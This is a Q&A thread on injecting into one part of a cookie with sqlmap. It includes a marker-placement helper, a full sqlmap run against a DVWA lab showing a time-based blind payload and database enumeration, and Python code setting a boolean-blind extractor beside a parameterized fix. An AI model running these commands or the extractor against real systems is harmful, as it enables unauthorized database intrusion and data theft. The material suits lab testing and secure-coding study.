How to inject into a part of a cookie using sqlmap
Asked: 2014-08-13 13:09:33
Question: I need to use sqlmap to do SQL injection into a part of a cookie. The target URL is static.
An example cookie:
Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../
In this cookie I need to inject into "userinput" using sqlmap. I know about the --cookie option, but it does not work in this case. It is like a part of the cookie has to be injected with sqlmap.
I don't know how to do this. Please help.
Answer 1: Intercept the whole request, save it to a file, then hand that file to sqlmap with the -r option; by default sqlmap should test the cookie.
sqlmap.py -r request.txt
You can use Tamper Data (a Firefox extension) or the free version of the Burp proxy to intercept the request.
Comments:
Thanks for the reply. I know about intercepting with Burp Suite, saving it to a text file and using that to send the POST request. If we do that, sqlmap will inject into all the parameters in the request and in the cookie. But I need to inject into one part of the cookie. Please help.
You can use "*": write * at the parameter you want to test. You can also specify the parameter with -p.
Hi, the cookie has many variable name and value pairs. One of them is this "/searchtext/userinput/". That is the part of the cookie. How do I add "*" in there? Please help.
Can you paste the cookie? You can mask the values.
Here is the cookie value - STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*
I added * to the search value but it doesn't work.
Answer 2:
Try something like this:
sqlmap.py -u localhost/vulnerable --cookie="STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*"
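Answer 1 (a raw request file for sqlmap -r) and Answer 2 (the '*' marker inside --cookie) both depend on getting the marker into the right place of a cookie whose value is itself a '/'-delimited, percent-encoded list of key/value pairs, as in the question. The helper below is an added example, not code from the original answers or from sqlmap: it places the marker after the value that follows a chosen key, preserving the cookie's existing encoding, and builds the raw request text that -r expects. The host and path, and the sample cookie modelled on the one posted in the comments, are constructed for illustration.

```python
"""Place sqlmap's '*' injection marker inside a structured cookie value and
build a raw request file for 'sqlmap -r'.
Added example; not from the original post and not sqlmap's own code."""
import re
from urllib.parse import unquote

# Constructed sample modelled on the cookie in the comments: a percent-encoded,
# '/'-delimited list of key/value pairs. Only the SEARCH_VALUE entry is of interest.
SAMPLE_COOKIE = (
    "STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter"
    "%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain"
    "%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext"
)

_ENCODED_SLASH = re.compile(r"%2[fF]")


def mark_cookie(cookie: str, key: str, marker: str = "*") -> str:
    """Return `cookie` with `marker` appended to the value that follows `key`.

    The cookie value is treated as '/key/value/key/value/...'. If the separators
    arrive percent-encoded ('%2F') the segments are left exactly as received and
    re-joined with '%2F', so nothing but the marker changes on the wire; a plain
    '/'-delimited value is handled the same way with '/'.
    """
    name, eq, raw = cookie.partition("=")
    if not eq:
        raise ValueError("expected a 'name=value' cookie")
    url_encoded = bool(_ENCODED_SLASH.search(raw))
    sep = "%2F" if url_encoded else "/"
    parts = _ENCODED_SLASH.split(raw) if url_encoded else raw.split("/")
    # Compare keys after decoding so '%5F'-style escapes still match.
    keys = [unquote(p) for p in parts]
    try:
        idx = keys.index(key)
    except ValueError:
        raise KeyError(f"{key!r} not present in cookie {name!r}") from None
    if idx + 1 >= len(parts):
        raise ValueError(f"{key!r} has no value to mark")
    parts[idx + 1] += marker  # marker goes after the value, never encoded
    return f"{name}={sep.join(parts)}"


def raw_request(host: str, path: str, cookie: str, method: str = "GET") -> str:
    """Build the text of a raw HTTP request suitable for 'sqlmap -r request.txt':
    request line, headers, CRLF line endings, blank line ending the headers."""
    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0",
        "Accept: */*",
        f"Cookie: {cookie}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


if __name__ == "__main__":
    marked = mark_cookie(SAMPLE_COOKIE, "SEARCH_VALUE")
    # Hypothetical target; replace with the real host and path.
    with open("request.txt", "w", newline="") as fh:
        fh.write(raw_request("target.example", "/app/", marked))
    print("--cookie form:  sqlmap -u http://target.example/app/ "
          f"--cookie='{marked}' --level=2")
    print("-r form:        sqlmap -r request.txt --level=2")
```

When sqlmap finds the marker it asks whether to process the custom injection marker; answer Y (the default, which --batch also takes), otherwise the literal '*' is sent as part of the cookie value and the whole parameter is tested instead of the marked spot. For the question's unencoded example ("Cookie1=blah_var1/blah_val1/searchtext/userinput/...") the same call with key "searchtext" yields "...searchtext/userinput*/...".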
Answer 3: I ran into the same problem injecting SQL through a Cookie. I looked at the help and at the code, and now it finally makes some sense; let me put forward my hypotheses:
1. Cookie-based injection only works with level>=2.
2. You need to specify --param-filter='COOKIE'.
3. Do not let sqlmap try URI injection when it asks, otherwise it fails by running GET/POST-based tests.
4. If you specified a custom injection marker on the cookie under test, do not proceed with it when asked, otherwise it will fail.
I have not tried that many combinations for points 3 and 4, so feel free to invalidate them. Anyway, try something like this:
sqlmap -u 'protocol://test.server/test_url/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
The options needed for cookie-based testing are: -u, --cookie, -p, --param-filter, --level.
Command tried on sqlmap version: 1.4.8#stable
Output:
$ sqlmap -u 'http://dvwa.local/vulnerabilities/sqli_blind/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
[sqlmap 1.4.8#stable banner, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:18:36 /2020-08-31/
[01:18:36] [WARNING] using '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir' as the output directory
[01:18:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site_com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[01:18:39] [INFO] testing connection to the target URL
[01:18:40] [INFO] testing if the target URL content is stable
[01:18:43] [INFO] target URL content is stable
do you want to URL encode cookie values (implementation specific)? [Y/n] y
[01:19:01] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[01:19:02] [INFO] testing for SQL injection on Cookie parameter 'id'
[01:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:19:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[01:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[01:19:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[01:19:17] [INFO] testing 'Generic inline queries'
[01:19:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[01:19:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[01:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:19:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:32] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:19:47] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[01:19:50] [INFO] testing 'MySQL inline queries'
[01:19:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:19:52] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:19:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:20:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[01:20:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[01:21:28] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] n
[01:23:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:23:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:23:47] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[01:24:08] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[01:24:08] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:24:27] [INFO] testing 'MySQL UNION query (65) - 21 to 40 columns'
[01:24:36] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high
---
[01:50:27] [INFO] the back-end DBMS is MySQL
[01:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:50:52] [INFO] fetching database names
[01:50:52] [INFO] fetching number of databases
[01:50:52] [INFO] retrieved: 2
[01:51:42] [INFO] retrieved: information_schema
[02:16:58] [INFO] retrieved: dvwa
available databases [2]:
[*] dvwa
[*] information_schema
[02:22:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 414 times
[02:22:32] [INFO] fetched data logged to text files under '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir/dvwa.local'
[*] ending @ 02:22:32 /2020-08-31/
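The run above ends with sqlmap reporting the cookie parameter 'id' as injectable, with the payload "id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr": the trailing 'EZrr'='EZrr re-balances a single-quoted string, which tells you the cookie value is being spliced into a quoted SQL literal. The following is an added example, not DVWA's code (the real query is not on this page): it assumes a query of the shape WHERE user_id = '<cookie id>', uses SQLite in place of MySQL (so the boolean-based technique is shown rather than the MySQL-only RLIKE/SLEEP one), and puts the vulnerable lookup next to the parameterized fix, with a small boolean-blind extractor driven through the vulnerable version the way sqlmap's boolean technique works. Table, rows and the cookie parser are constructed for illustration.

```python
"""Quoted cookie value spliced into SQL (injectable) versus a bound parameter,
plus boolean-blind extraction through the injectable path.
Added example; not DVWA's code and not from the original answer."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL database behind the app (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn


def cookie_value(cookie_header: str, name: str):
    """Pull one value out of a 'Cookie:' header (minimal parser, constructed here)."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


def lookup_vulnerable(conn, cookie_header: str):
    """The injectable pattern: the cookie's 'id' becomes part of the SQL text.
    The assumed query shape mirrors what sqlmap's payload re-balances."""
    uid = cookie_value(cookie_header, "id")
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{uid}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, cookie_header: str):
    """Hardened form: the same value travels as a bound parameter, never as SQL."""
    uid = cookie_value(cookie_header, "id")
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (uid,)).fetchall()


def blind_extract(conn, expr: str, max_len: int = 16) -> str:
    """Boolean-based blind extraction through lookup_vulnerable(): one yes/no
    question per character position, exactly the oracle sqlmap builds from a
    'row returned / no row returned' difference. `expr` is a scalar subquery."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"1' AND substr(({expr}),{pos},1)='{ch}"
            if lookup_vulnerable(conn, f"id={probe}; security=high"):
                out += ch
                break
        else:
            break  # no character matched: end of the string
    return out


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "id=1' OR '1'='1; security=high"))      # every row
    print(lookup_parameterized(db, "id=1' OR '1'='1; security=high"))   # no row
    print(blind_extract(db, "SELECT lower(first_name) FROM users WHERE user_id=2"))
```

The two bracketing probes sqlmap uses for its boolean technique are visible here as "1' AND '1'='1" (a row comes back) against "1' AND '1'='2" (none); the parameterized version returns nothing for any of them because the whole string is compared as a value.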
Answer 4: This will test the parameter auth in the cookie:
sqlmap -u "website" --cookie='auth=blabla; uuid=blabla' -p auth --level=2
Level must be at least 2. This is not the only way to specify the parameter to test; you can also mark the injection point with *.
sqlmap -u "website" --cookie='auth=blabla; uuid=*' --level=2